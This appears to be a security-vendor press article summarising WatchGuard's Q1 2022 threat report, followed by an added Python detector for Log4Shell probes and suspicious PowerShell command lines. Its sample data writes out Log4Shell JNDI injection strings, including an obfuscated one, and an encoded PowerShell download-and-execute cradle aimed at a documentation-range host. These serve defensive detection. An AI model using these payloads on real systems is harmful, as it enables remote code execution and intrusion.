Ransomware volume in Q1-2022 higher than in all of 2021!


WatchGuard has released its Internet Security Report for the first quarter of 2022. The headline finding: ransomware detections in Q1 2022 already amount to twice the total for all of 2021. The analysis also shows a tripling of attacks on Log4Shell, the return of the Emotet botnet, a rise in cryptomining activity, and the emergence of LAPSUS$.

The threat of ransomware continues to grow: according to an analysis by the WatchGuard Threat Lab, there were already twice as many relevant attack attempts in the first quarter of 2022 as in the entire previous year. Corey Nachreiner, Chief Security Officer at WatchGuard, said: “Based on the extremely high level of ransomware at the beginning of the year and our data from the previous quarters, we expect 2022 to break all previous ransomware records.

For this reason, we strongly recommend that every company - and especially those in the particularly affected EMEA region - implement effective measures for extensive protection of IT infrastructures. A holistic approach plays a decisive role in this context, because only with the help of unified security can the constantly evolving threats be countered efficiently in the long term.” As if the threat posed by ransomware were not enough, the WatchGuard Threat Lab also recorded, in the first quarter of 2022, the large-scale return of the Emotet botnet, a tripling of attacks on the Log4Shell vulnerability, and an increase in malicious cryptomining activity.

Findings from the Internet Security Report Q1-2022

  • Number of ransomware attacks exploded – As recently as the fourth quarter of 2021, the WatchGuard Internet Security Report noted a decline in the number of ransomware attacks compared to the previous year. This trend reversed dramatically in the first quarter of 2022: the number of ransomware detections in Q1 2022 is already double the total number of detections for all of 2021.
  • EMEA region remains a hotspot for malware threats - Regional attribution of both simple and evasive malware shows that Firebox appliances in Europe, the Middle East and Africa (EMEA), accounting for 57 percent of all detections, were attacked significantly more often than appliances in North, Central and South America (AMER, 22 percent) or the Asia-Pacific region (APAC, 21 percent).
  • REvil is gone, LAPSUS$ steps in – Although the notorious REvil gang dissolved in the fourth quarter of 2021, another extortion group, LAPSUS$, is now attracting attention. WatchGuard's initial analysis suggests that it could contribute to a sustained expansion of the ransomware threat landscape, alongside many new ransomware variants such as BlackCat, reportedly the first ransomware written in the Rust programming language.
  • Log4Shell added to top 10 list of network attacks - The Apache Log4j2 vulnerability, also known as Log4Shell, became public in early December 2021 and, despite that late disclosure, already appeared on the top 10 list of network attacks for that quarter. Measured against all IPS detections, the share of the Log4Shell signature almost tripled in the first quarter of this year. Log4Shell was highlighted as a top security incident in the previous Internet Security Report because of its maximum score of 10.0 in the Common Vulnerability Scoring System (CVSS). The reasons are the ubiquity of Java applications that log attacker-controlled input and the ease with which the flaw allows arbitrary code execution.
  • Emotet makes a comeback – Emotet accounted for three of the top 10 detections in the first three months of this year and, after its return in the fourth quarter of 2021, was the most widespread malware in Q1 2022. The variants Trojan.Vita (which targets Japan in particular and also appears in the top five list of malware delivered over encrypted connections) and Trojan.Valyria both use exploits in Microsoft Office to download Emotet. The third Emotet-related sample, MSIL.Mensa.4, can spread via attached storage devices and primarily targeted networks in the US. WatchGuard Threat Lab data shows Emotet acting as a dropper, downloading and installing further payloads from a malware delivery server.
  • PowerShell scripts at the forefront of growing endpoint attacks - The total number of identified endpoint attacks rose 38 percent quarter over quarter in the first quarter. Scripts, especially PowerShell-based ones, were the dominant attack vector during this period: with a share of 88 percent, they drove the growth in endpoint events compared to the previous quarter, and PowerShell scripts accounted for 99.6 percent of script-related incidents in the first three months. The trend is clear: attackers increasingly rely on fileless and living-off-the-land attacks that use legitimate tools. Although scripts dominate, WatchGuard's data shows that other sources of malware should not be overlooked either.
  • Legitimate cryptomining with malicious background activity - The three additions to the top malware domains list in Q1 2022 were all related to Nanopool, a popular mining pool in which miners combine their hashing power across several cryptocurrencies in exchange for a steadier payout. Technically, these domains are legitimate and belong to a legally operating organisation. However, connections to these mining pools from corporate or educational networks almost always originate from malware infections rather than legitimate mining activity.
  • Organizations continue to face a variety of unique network attacks - While the top 10 IPS signatures accounted for 87 percent of all network attacks, the number of unique detections hit its highest level since early 2019. The two figures together indicate that automated attacks concentrate on a small subset of exploits rather than spraying every exploit available, while companies are nonetheless still being hit by a wide range of attacks.
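Two of the findings above, the Log4Shell probes counted by IPS signatures and the PowerShell-driven living-off-the-land activity, are things a defender can check for in their own logs. The following Python is an added example written for this page; it is not WatchGuard code and is not taken from the report. The Apache-style access-log lines and the PowerShell command lines are constructed for the example (the IP addresses are documentation ranges), and the indicator lists are this editor's own selection, not the Threat Lab's signatures. It goes slightly beyond the text by also unwrapping the common `${lower:}`/`${::-}` obfuscations of the JNDI lookup string and decoding `-EncodedCommand` payloads before scanning them.

```python
"""Added example (not from the report): two log-level detection checks,
Log4Shell lookup strings in web access logs and living-off-the-land
indicators in PowerShell command lines. All sample data is constructed."""
import base64
import re
import urllib.parse

# ---- Log4Shell (Apache Log4j2 JNDI lookup) probe detection -----------------

_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:j}
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")              # ${env:X:-j}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")


def normalize_log4j(s: str) -> str:
    """Undo the evasions commonly wrapped around `${jndi:` so that a plain
    pattern match works: URL encoding, case-conversion lookups and
    default-value lookups, nested to any (bounded) depth."""
    s = urllib.parse.unquote(s)
    for _ in range(10):  # each round strips one nesting level
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == s:
            break
        s = new
    return s.lower()


def detect_log4shell(log_line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    Log4Shell lookup string, else None."""
    m = _JNDI.search(normalize_log4j(log_line))
    return m.group(1) if m else None


# ---- PowerShell living-off-the-land indicators -----------------------------

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...).
_ENC_ARG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

_PS_INDICATORS = [  # editor's selection, not WatchGuard signatures
    (re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"invoke-expression|\biex\b", re.I), "invoke-expression"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "profile suppressed"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-ex\w*\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"frombase64string", re.I), "inline base64 decode"),
]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument (base64 of
    UTF-16LE, as powershell.exe expects), or None if there is none."""
    for m in _ENC_ARG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy is not an encoded command
        try:
            return base64.b64decode(blob).decode("utf-16-le")
        except ValueError:  # bad base64 or not UTF-16
            return None
    return None


def analyze_powershell(cmdline: str) -> dict:
    """Decode any encoded payload, then scan the raw command line and the
    decoded script for living-off-the-land indicators."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    indicators = [name for rx, name in _PS_INDICATORS if rx.search(haystack)]
    if decoded is not None:
        indicators.insert(0, "encoded command")
    return {"decoded": decoded, "indicators": indicators}


def _ps_encode(script: str) -> str:
    """Build an -EncodedCommand blob (used only to construct sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data; the attacker address is a documentation range.
WEB_LOG = [
    '203.0.113.7 - - [01/Feb/2022:10:01:22 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [01/Feb/2022:10:01:23 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-r}mi://203.0.113.7/x}"',
    '203.0.113.7 - - [01/Feb/2022:10:01:24 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fx%7D HTTP/1.1" 200 "-" "curl/7.68.0"',
    '198.51.100.4 - - [01/Feb/2022:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
]
PS_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc " + _ps_encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in WEB_LOG:
        print(detect_log4shell(line), "<-", line[-60:])
    for cmd in PS_CMDLINES:
        print(analyze_powershell(cmd)["indicators"])
```

The normalisation step is the part worth copying: a signature that only looks for the literal `${jndi:` misses the second sample line, which is what the obfuscated probes seen in the wild looked like. On the PowerShell side, `-ExecutionPolicy Bypass` on its own is common in legitimate administration, so the indicator count rather than any single hit is what should drive an alert.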

All of these findings in WatchGuard's quarterly research report are based on de-identified Firebox Feed data from active WatchGuard Fireboxes whose owners have consented to sharing data in support of the Threat Lab's research. In the first quarter of 2022, WatchGuard blocked a total of more than 21.5 million malware variants (274 per device) and approximately 4.7 million network threats (60 per device). In addition to its analysis of the malware and network trends of the first quarter of 2022, the full report contains recommended security strategies and defence tips for companies of all sizes and industries.

More at Watchguard.com

About WatchGuard

WatchGuard Technologies is one of the leading providers in the field of IT security. Its extensive product portfolio ranges from advanced UTM (Unified Threat Management) and next-generation firewall platforms to multi-factor authentication, comprehensive WLAN protection and endpoint protection, as well as other IT security products and intelligent services. More than 250,000 customers worldwide rely on its enterprise-grade protection mechanisms,
